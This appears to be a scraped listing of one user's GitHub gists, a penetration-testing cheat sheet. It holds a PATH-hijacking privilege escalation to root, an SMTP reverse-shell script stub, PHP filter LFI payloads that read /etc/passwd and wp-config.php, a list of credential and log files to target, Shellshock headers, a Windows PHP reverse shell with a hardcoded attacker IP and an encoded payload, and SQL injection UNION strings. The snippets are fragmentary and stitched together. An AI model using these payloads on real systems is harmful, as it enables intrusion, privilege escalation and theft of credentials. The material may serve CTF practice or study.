these are the regular library path
>>> import sys
>>> print "\n".join(sys.path)
/usr/lib/python2.7
/usr/lib/python2.7/plat-x86_64-linux-gnu
/usr/lib/python2.7/lib-tk
tanaka tanaka-geek
tanaka-geek
/ library-hijacking.md
Last active
April 24, 2021 15:21
python library hijacking (writable)
tanaka-geek
/ variable-path-privesc.md
Created
April 22, 2021 14:01
Privilege Escalation is possible with variable path
We assume that ps is given a root permission and we can change the variable path to ps to /malicious/ps
cd /home/raj/script/
cp /bin/sh /tmp/ps
echo $PATH
export PATH=/tmp:$PATH
./shell
whoami -> root
tanaka-geek
/ smtp-send-mail.py
Created
April 22, 2021 10:42
Send mail via SMTP to get a reverse shell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from email.mime.multipart import MIMEMultipart | |
| from email.mime.text import MIMEText | |
| import smtplib | |
| import sys | |
| lhost = "127.0.0.1" | |
| lport = 443 | |
| rhost = "192.168.1.1" | |
| rport = 25 |
tanaka-geek
/ smtp enumeration.md
Last active
May 5, 2021 15:11
SMTP offers email address that maybe username for some services...
ismtp is a tool that enumerates emails
> ismtp -h 192.168.50.11 -e emails.txt
---------------------------------------------------------------------
iSMTP v1.6 - SMTP Server Tester, Alton Johnson ([email protected])
---------------------------------------------------------------------
Testing SMTP server [user enumeration]: 192.168.50.11:25
If no command is specified, the -l (list) option will list the allowed (and forbidden) commands for the invoking user (or the user specified by the -U option) on the current host
sudo -l
Matching Defaults entries for fredf on dc-9:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binsudo --list reads configuration file and shows the matching user's allowed commands
tanaka-geek
/ php-wrapper.md
Last active
June 30, 2021 22:40
php stream wrappers that will come handy
can display php files in text otherwise that is executed.
php://filter/convert.base64-encode/resource=file:///challenge
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/var/www/html/wp-config.php
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # contains credentials | |
| /etc/passwd | |
| /etc/htpasswd/.htpasswd | |
| /etc/apache2/htpasswd | |
| # contains logs : Log Poisoning might be possible with LFI | |
| /etc/apache2/logs/access.log | |
| /etc/apache2/logs/error.log | |
| /etc/apache/logs/access.log | |
| /etc/apache/logs/error.log |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| User-Agent: () { :;}; /bin/bash -c "echo this is vulnerable" | |
| env CVE_2014_7169='() { (a)=>\' bash -c "echo date"; cat echo |
tanaka-geek
/ windows-php-reverse-shell.php
Last active
June 27, 2021 19:34
windows reverse shell metasploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php header('Content-type: text/plain');$ip='172.16.4.1';$port ='443';$payload='7Vh5VFPntj9JDklIQgaZogY5aBSsiExVRNCEWQlCGQQVSQIJGMmAyQlDtRIaQGKMjXUoxZGWentbq1gpCChGgggVFWcoIFhpL7wwVb2ABT33oN6uDm+tt9b966233l7Z39779/32zvedZJ3z7RO1yQjgAAAAUUUQALgAvBEO8D+LBlWqcx0VqLK+4XIBw7vhEr9VooKylIoMpVAGpQnlcgUMpYohpVoOSeRQSHQcJFOIxB42NiT22xoxoQDAw+CAH1KaY/9dtw+g4cgYrAMAoQEd1ZPopwG1lai2v13dDI59s27M2/W/TX4zhwru9Qi9jem/4fTfbwKt54cB/mPZagIA5n+QlxCT5PnaOfm7BWH/cn37UJ7Xv7fxev+z/srjvOF5/7a59rccu7/wTD4enitmvtzFxhprXWZ0rHvn3Z0jVw8CQCEVZbgBwCIACBhqQ5A47ZBfeQSHAxSZYNa1EDYRIIDY6p7xKZBNRdrZFDKdsWhgWF7TTaW3gQTrZJAUYHCfCBjvctfh6OWAJ2clIOCA+My6kdq5XGeKqxuRW9f10cvkcqZAGaR32rvd+nNwlW5jf6ZCH0zX+c8X2V52wbV4xoBS/a2R+nP2XDqFfFHbPzabyoKHbB406JcRj/qVH/afPHd5GLfBPH+njrX2ngFeBChqqmU0N72r53JM4H57U07gevzjnkADXhlVj5kNEHeokIzlhdpJDK3wuc0tWtFJwiNpzWUvk7bJbXOjmyE7+CAcGXj4Vq/iFd4x8IC613I+0IoWFOh0qxjnLUgAYYnLcL3N+W/tCi8ggKXCq2vwNK6+8ilmiaHKSPZXdKrq1+0tVHkyV/tH1O2/FHtxVgHmccSpoZa5ZCO9O3V3P6aoKyn/n69K535eDrNc9UQfmDw6aqiuNFx0xctZ+zBD7SOT9oXWA5kvfUqcLxkjF2Ejy49 |
it is like basic thing to try
' UNION SELECT 1,version(),3,4,5,6
' UNION SELECT 1,version(),3,4,5,6,7,8,9... # add more until it works
' UNION ALL SELECT 1,version(),gRoUp_cOncaT(0x7c,schema_name,0x7C),4,5,6 fRoM information_schema.schemata#
' UNION ALL SELECT 1,version(),gRoUp_cOncaT(0x7c,schema_name,0x7C),4,5,6 fRoM information_schema.schemata#